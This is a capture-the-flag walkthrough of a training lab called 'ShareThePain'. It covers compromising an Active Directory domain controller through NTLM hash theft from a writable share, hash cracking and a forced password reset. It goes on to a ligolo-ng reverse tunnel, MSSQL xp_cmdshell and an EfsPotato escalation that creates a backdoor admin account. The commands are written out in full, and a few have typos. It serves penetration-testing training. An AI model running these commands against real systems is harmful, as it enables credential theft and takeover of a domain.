ShareThePain

AD Challenge Lab (Medium) - by Ryan Yager

Coursecourses.hacksmarter.org

The following post by 0xb0b is licensed under CC BY 4.0

---

Scope and Objective

Objective: You're a penetration tester on the Hack Smarter Red Team. Your mission is to infiltrate and seize control of the client's entire Active Directory environment. This isn't just a test; it's a full-scale assault to expose and exploit every vulnerability.

Initial Access: For this engagement, you've been granted direct network access to the client's network. The door is open, but you're starting with zero credentials. From here, every move counts.

Execution: Your objective is simple but demanding: enumerate, exploit, and own. Your ultimate goal is not just to get in, but to achieve a full compromise, elevating your privileges until you hold the keys to the entire domain.

Recon

The rustscan of 10.1.78.42 revealed numerous Windows/Active Directory-related services, including DNS 53, Kerberos 88/464, LDAP 389/636/3268/3269, SMB 139/445, RPC 135/593, RDP 3389, and Windows Remote Management 5985. This indicates the host is likely a domain controller with directory services as a attack surface.

rustscan -a 10.1.78.42 -- -sV -sC

From the default script and service scan we are able to retrieve the domains. We add them to our /etc/hosts file.

DC01.hack.smarter
hack.smarter

Access as guest

We enumerate the target using NetExec. Since we do not have any accounts available yet, we try the Guest user with an empty password. We are lucky - Access as Guest is granted and the $IPC share is readable, which would allow us to to enumerate additional users using rid brute force. Even better, there is also a share called Share where the Guest user has both read and write permissions.

nxc smb DC01.hack.smarter -u guest -p '' --shares

We connect to the share using smbclient. But there is nothing.

smbclient //DC01.hack.smarter/Share -U 'hack.smarter\guest'% 

Access as bob.ross

But since we can write, we can try to place a file in the share that connects to us when opened or viewed in browser and reveals the hash of the calling user. This is called NTLM theft. There is already a handy tool for creating such files:

GitHub - Greenwolf/ntlm_theft: A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf)GitHub

We prepare the files,

ntlm_thef.py --verbose --generate modern --server 10.200.0.156 --filename "sharethepain"

and set up Resonder (with root privileges) to catch the request.

responder -I tun0

Next, we place the .lnk file in that share.

We get a connection with the NTLMv2-SSP hash of bob.ross.

We use hashcat to crack the hash.

hashcat -a5600 -a0 bob.hash

Shell as alice.wonderland

With the credentials from bob.ross, we continue with the enumeration and use Bloodhound for this purpose. Since I had problems with DNS timeouts, I used DNSChef for this case.

dnschef.py --fakeip 10.1.168.5 -q

We run the collectors script bloodhound-ce.py with the credentials of bob.ross.

bloodhound-ce.py --zip -c All -d hack.smarter -u bob.ross -p 'REDACTED' -dc DC01.hack.smarter -ns 127.0.0.1

We feed the data into Bloodhound and analyse it using the available cypher queries and the OutBound Object Control relationships. We see that bob.ross has a GenericAll relationship to alice.wonderland. This allows us to change the password for that user.

ForceChangePassword | The Hacker Recipeswww.thehacker.recipes

Furthermore we can see that alice.wonderland is also part of the remote management users group.

We change the password for alice.wonderland using net rpc.

net rpc password 'alice.wonderland' 'newP@ssword2022' -U 'hack.smarter/bob.ross%REDACTED -S DC01.hack.smarter

With the new credentials we are able to log in to the machine using evil-winrm. We'll find the first flag in C:\Users\alice.wonderland\Desktop\user.txt.

evil-winrm -i hack.smarter -u alice.wonderland -p 'newP@ssword2022'

Access as nt service\mssql$sqlexpress

When enumerating, it is noticeable that SQL2019 is probably installed. This prompts us to search for internal ports, since no SQL related ports appeared in the Rustscan results. Eventually, we find what we are looking for. The machine is listening on 1433 (MSSQL) on localhost.

netstat -ano | findstr LISTENING

For the upcomming tasks we could also use chisel, but we'll continue with Ligolo-ng for portforwarding.

Ligolo-ng setup

For the subsequent phases, we use ligolo to relay traffic between the target machine and our attacker machine to make the internal and external services of the target machine accessible to our attacker machine.

Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

First, we set up a TUN (network tunnel) interface called ligolo and configuring routes to forward traffic for specific IP ranges (240.0.0.1) through the tunnel.

sudo ip tuntap add user root mode tun ligolo

sudo ip link set ligolo up

sudo ip route add 240.0.0.1 dev ligolo

Next, we download the latest release of ligolo-ng. The proxy and the agent are in the amd64 version.

Release Ligolo-ng v0.8.2 · nicocha30/ligolo-ngGitHub

On our attack machine, we start the proxy server.

./proxy -selfcert

Next, we upload and run the agent using evil-winrm to connect to our proxy.

upload agent.exe

./agent.exe -connect 10.200.0.203:11601 --ignore-cert

We get a message on our ligolo-ng proxy that an agent has joined. We use session to select the session and then start it.

We can confirm that we are now able to reach 1433.

nmap -p 1433 -sC -sV  240.0.0.1 

We use Netexec to check whether the setting for an xp_cmdshell exists. This would allow us to run commands in the context of the service account running. We are able to execute commands, we are nt service\mssql$sqlexpress with the dangerous privilege SeImpersonatePrivilege enabled. This potentially enables us to execute commands in the context of the NT Authority System account using a Potato exploit.

nxc mssql 240.0.0.1 -u alice.wonderland -p ./agent 'newP@ssword2022'

nxc mssql 240.0.0.1 -u alice.wonderland -p ./agent 'newP@ssword2022' -x "whoami /priv"

Shell as localadmin

We will use the EfsPotato exploit. We must compile this one locally on the target machine. We will explain the procedure in the repository. We clone the repository and upload the C# file using evil-winrm.

GitHub - zcgonvh/EfsPotato: Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).GitHub

We check for a compiler at C:\Windows\Microsoft.Net\Framework\ and see a v4.0 version is persent. Nice.

We download the source file from out attacker machine, compile with the compiler found at C:\Windows\Microsoft.Net\Framework\v4....

C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618

The exploit was originally located in the Documents folder of alice.wonderland, but since the service account did not have access permissions, we moved it to C:\Temp.

We run the exploit using Netexec and see its execution output.

nxc mssql 240.0.0.1 -u alice.wonderland -p 'newP@ssword2022' -x "C:\\Temp\\efspotato.exe"

Next, we use the exploit to create our own local admin account.

nxc mssql 240.0.0.1 -u alice.wonderland -p 'newP@ssword2022' -x "C:\\Temp\\efspotato.exe \"cmd.exe /c net user 0xb0b Password123! /add && net localgroup administrators 0xb0b /add\""

We try to connect to the machine using our new account, but the connection fails. This might be because the user is not a domain user. But we are able to connect through our tunnel. This will hit the specific host we tunneled into. We find the final flag at C:\Users\Administrator\Desktop\root.txt.

evil-winrm -i 240.0.0.1 -u 0xb0b -p 'Password123!'